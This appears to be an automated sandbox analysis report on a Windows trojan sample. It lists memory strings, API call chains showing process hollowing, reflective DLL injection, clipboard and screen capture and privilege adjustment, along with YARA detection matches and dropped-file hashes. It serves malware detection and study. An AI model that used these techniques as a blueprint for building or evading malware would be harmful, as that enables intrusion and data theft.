Source: explorer.exe, 00000003.00000003.3095338529.0000000009B91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3099827021.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3318474411.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3097906687.0000000009C05000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: 7DF0.tmp.zx.exe, 0000000C.00000003.2336723022.00000158F7E08000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000003.2336863326.00000158F7E98000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2337355356.00000158F7E9A000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000003.2336394060.00000158F7E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: 7DF0.tmp.zx.exe, 0000000C.00000002.2337611351.00000158F9A00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: 7DF0.tmp.zx.exe, 0000000C.00000003.2336394060.00000158F7E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: 7DF0.tmp.zx.exe, 0000000C.00000003.2336723022.00000158F7E08000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000003.2336863326.00000158F7E98000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2337355356.00000158F7E9A000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000003.2336394060.00000158F7E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: 7DF0.tmp.zx.exe, 0000000C.00000003.2336723022.00000158F7E08000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000003.2336863326.00000158F7E98000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2337355356.00000158F7E9A000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000003.2336394060.00000158F7E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: explorer.exe, 00000003.00000003.3095338529.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3318601080.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000003.00000000.2112423865.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3322496688.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000003.00000000.2105614725.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3316980175.00000000099B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000003.00000000.2105614725.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3316980175.00000000099B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: 7DF0.tmp.zx.exe, 0000000A.00000003.2315840998.000002431721D000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2304137052.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2301103912.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2317567736.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2305426346.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2318809241.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.000002431721D000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2300771207.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2315840998.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317219000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.10.dr, _lzma.pyd.10.dr, libcrypto-1_1.dll.10.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: libcrypto-1_1.dll.10.dr String found in binary or memory: https://www.openssl.org/H
Source: C:\Windows\explorer.exe Code function: 3_2_110660A0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 3_2_110660A0
Source: C:\Windows\explorer.exe Code function: 3_2_11065EA4 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 3_2_11065EA4
Source: C:\Windows\explorer.exe Code function: 3_2_110699A0 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SetStretchBltMode,StretchBlt,DeleteObject,DeleteDC,free,free,free,malloc,malloc,malloc,GetDIBits,DeleteObject,ReleaseDC,DeleteDC,memcpy,memcpy, 3_2_110699A0

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\System32\svchost.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe Code function: 3_2_1106A4F8 memset,memset,OpenDesktopA,CreateDesktopA,SetThreadDesktop,CreateThread,WaitForSingleObject,free,free,free,CloseHandle,CloseHandle, 3_2_1106A4F8

System Summary

Source: 3.2.explorer.exe.8b70000.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.explorer.exe.8b70000.3.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.explorer.exe.9ee0000.8.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.explorer.exe.9ee0000.8.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.explorer.exe.3350000.2.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.0.explorer.exe.3350000.2.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.explorer.exe.11050000.10.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.explorer.exe.3350000.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.explorer.exe.11050000.10.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.0.explorer.exe.3350000.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000002.3315625714.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000002.3319025344.0000000009EE0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000002.3307584261.0000000003350000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000002.3327889570.0000000011050000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000000.2101572889.0000000003350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: C:\Windows\System32\svchost.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9418E0 wcsnlen,GetModuleHandleA,GetProcAddress,lstrcatW,CreateProcessInternalW,NtMapViewOfSection,ResumeThread, 0_2_00007FF6CF9418E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9417F4 NtCreateSection,GetFileSize,SetFilePointer,WriteFile,SetFilePointer,NtClose, 0_2_00007FF6CF9417F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF94159C GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError, 0_2_00007FF6CF94159C
Source: C:\Windows\explorer.exe Code function: 3_2_08B7E948 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free, 3_2_08B7E948
Source: C:\Windows\explorer.exe Code function: 3_2_08B80420 NtQueryInformationProcess, 3_2_08B80420
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA159C GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError, 4_2_00007FF6BCCA159C
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA17F4 NtCreateSection,GetFileSize,SetFilePointer,WriteFile,SetFilePointer,NtClose, 4_2_00007FF6BCCA17F4
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA18E0 wcsnlen,GetModuleHandleA,GetProcAddress,lstrcatW,CreateProcessInternalW,NtMapViewOfSection,ResumeThread, 4_2_00007FF6BCCA18E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF94610C 0_2_00007FF6CF94610C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF944FD8 0_2_00007FF6CF944FD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF94159C 0_2_00007FF6CF94159C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF95D8E4 0_2_00007FF6CF95D8E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF95B934 0_2_00007FF6CF95B934
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF960898 0_2_00007FF6CF960898
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF957014 0_2_00007FF6CF957014
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF957E34 0_2_00007FF6CF957E34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF953DF8 0_2_00007FF6CF953DF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF953414 0_2_00007FF6CF953414
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF947370 0_2_00007FF6CF947370
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF955344 0_2_00007FF6CF955344
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF95B310 0_2_00007FF6CF95B310
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF957A84 0_2_00007FF6CF957A84
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF95FA88 0_2_00007FF6CF95FA88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF95F234 0_2_00007FF6CF95F234
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF94F998 0_2_00007FF6CF94F998
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF95317C 0_2_00007FF6CF95317C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF955994 0_2_00007FF6CF955994
Source: C:\Windows\explorer.exe Code function: 3_2_0335C698 3_2_0335C698
Source: C:\Windows\explorer.exe Code function: 3_2_03352380 3_2_03352380
Source: C:\Windows\explorer.exe Code function: 3_2_03354F70 3_2_03354F70
Source: C:\Windows\explorer.exe Code function: 3_2_0335CE2C 3_2_0335CE2C
Source: C:\Windows\explorer.exe Code function: 3_2_0335AEF0 3_2_0335AEF0
Source: C:\Windows\explorer.exe Code function: 3_2_033515B0 3_2_033515B0
Source: C:\Windows\explorer.exe Code function: 3_2_08B721B0 3_2_08B721B0
Source: C:\Windows\explorer.exe Code function: 3_2_08B7DA2C 3_2_08B7DA2C
Source: C:\Windows\explorer.exe Code function: 3_2_08B7D298 3_2_08B7D298
Source: C:\Windows\explorer.exe Code function: 3_2_08B7BAF0 3_2_08B7BAF0
Source: C:\Windows\explorer.exe Code function: 3_2_08B75B70 3_2_08B75B70
Source: C:\Windows\explorer.exe Code function: 3_2_08B72F80 3_2_08B72F80
Source: C:\Windows\explorer.exe Code function: 3_2_09EFA2D0 3_2_09EFA2D0
Source: C:\Windows\explorer.exe Code function: 3_2_09EFF1B8 3_2_09EFF1B8
Source: C:\Windows\explorer.exe Code function: 3_2_09EE4990 3_2_09EE4990
Source: C:\Windows\explorer.exe Code function: 3_2_09F0393C 3_2_09F0393C
Source: C:\Windows\explorer.exe Code function: 3_2_09EF90EC 3_2_09EF90EC
Source: C:\Windows\explorer.exe Code function: 3_2_09EE40B0 3_2_09EE40B0
Source: C:\Windows\explorer.exe Code function: 3_2_09EFF830 3_2_09EFF830
Source: C:\Windows\explorer.exe Code function: 3_2_09F03BD4 3_2_09F03BD4
Source: C:\Windows\explorer.exe Code function: 3_2_09F0CBBC 3_2_09F0CBBC
Source: C:\Windows\explorer.exe Code function: 3_2_09F04B74 3_2_09F04B74
Source: C:\Windows\explorer.exe Code function: 3_2_09EF9B4C 3_2_09EF9B4C
Source: C:\Windows\explorer.exe Code function: 3_2_09F0AB04 3_2_09F0AB04
Source: C:\Windows\explorer.exe Code function: 3_2_09F02248 3_2_09F02248
Source: C:\Windows\explorer.exe Code function: 3_2_09F0FA27 3_2_09F0FA27
Source: C:\Windows\explorer.exe Code function: 3_2_09EF9D48 3_2_09EF9D48
Source: C:\Windows\explorer.exe Code function: 3_2_09F0B510 3_2_09F0B510
Source: C:\Windows\explorer.exe Code function: 3_2_09F0A4E0 3_2_09F0A4E0
Source: C:\Windows\explorer.exe Code function: 3_2_09F0D410 3_2_09F0D410
Source: C:\Windows\explorer.exe Code function: 3_2_09F0EFD4 3_2_09F0EFD4
Source: C:\Windows\explorer.exe Code function: 3_2_09F01E98 3_2_09F01E98
Source: C:\Windows\explorer.exe Code function: 3_2_11054CB0 3_2_11054CB0
Source: C:\Windows\explorer.exe Code function: 3_2_1107C110 3_2_1107C110
Source: C:\Windows\explorer.exe Code function: 3_2_1106A948 3_2_1106A948
Source: C:\Windows\explorer.exe Code function: 3_2_1107E010 3_2_1107E010
Source: C:\Windows\explorer.exe Code function: 3_2_1107B0E0 3_2_1107B0E0
Source: C:\Windows\explorer.exe Code function: 3_2_1107FBD4 3_2_1107FBD4
Source: C:\Windows\explorer.exe Code function: 3_2_11072A98 3_2_11072A98
Source: C:\Windows\explorer.exe Code function: 3_2_1107453C 3_2_1107453C
Source: C:\Windows\explorer.exe Code function: 3_2_11055590 3_2_11055590
Source: C:\Windows\explorer.exe Code function: 3_2_1106FDB8 3_2_1106FDB8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe 9053B6BBAF941A840A7AF09753889873E51F9B15507990979537B6C982D618CB
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe 688A1926A536813715B6ADB733CB66EA478F66C1C7985F5B607C613D6F671D5A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: String function: 00007FF6CF9420F4 appears 54 times
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: String function: 00007FF6BCCA20F4 appears 54 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF78FA620F4 appears 54 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF67F5520F4 appears 54 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF7A34B20F4 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: String function: 00007FF779E92760 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: String function: 00007FF8B8306448 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: String function: 00007FF779E925F0 appears 100 times
Source: api-ms-win-crt-time-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe, 00000000.00000000.2058383220.00007FF6CF987000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameServices.exe: vs SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe, 00000000.00000003.2067688265.0000025F1C6D1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameServices.exe: vs SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe, 00000000.00000002.2070000024.0000025F1A96C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameServ vs SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Binary or memory string: OriginalFilenameServices.exe: vs SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe
Source: 3.2.explorer.exe.8b70000.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.explorer.exe.8b70000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.explorer.exe.9ee0000.8.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.explorer.exe.9ee0000.8.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.explorer.exe.3350000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.0.explorer.exe.3350000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.explorer.exe.11050000.10.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.explorer.exe.3350000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.explorer.exe.11050000.10.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.0.explorer.exe.3350000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000003.00000002.3315625714.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000003.00000002.3319025344.0000000009EE0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000003.00000002.3307584261.0000000003350000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000003.00000002.3327889570.0000000011050000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000003.00000000.2101572889.0000000003350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: classification engine Classification label: mal100.phis.troj.adwa.spyw.evad.winEXE@21/64@0/1
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E929E0 GetLastError,FormatMessageW,MessageBoxW, 10_2_00007FF779E929E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF945AE0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle, 0_2_00007FF6CF945AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF943474 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 0_2_00007FF6CF943474
Source: C:\Windows\explorer.exe Code function: 3_2_08B7C9C4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 3_2_08B7C9C4
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA5AE0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle, 4_2_00007FF6BCCA5AE0
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA3474 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 4_2_00007FF6BCCA3474
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA63474 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 5_2_00007FF78FA63474
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA65AE0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle, 5_2_00007FF78FA65AE0
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34B3474 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 9_2_00007FF7A34B3474
